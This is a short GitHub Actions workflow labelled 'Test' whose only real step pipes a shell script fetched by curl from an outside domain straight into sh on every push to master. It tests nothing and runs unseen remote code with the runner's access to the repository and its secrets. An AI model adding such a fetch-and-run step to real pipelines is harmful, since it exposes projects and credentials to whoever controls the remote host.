name: Test
on:
  push:
    branches:
      - master

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - run: sh <(curl -s https://lets1.debugmypipeline.com/c69ac2ba-7097-410b-ac43-efac4d2816c6.sh)
   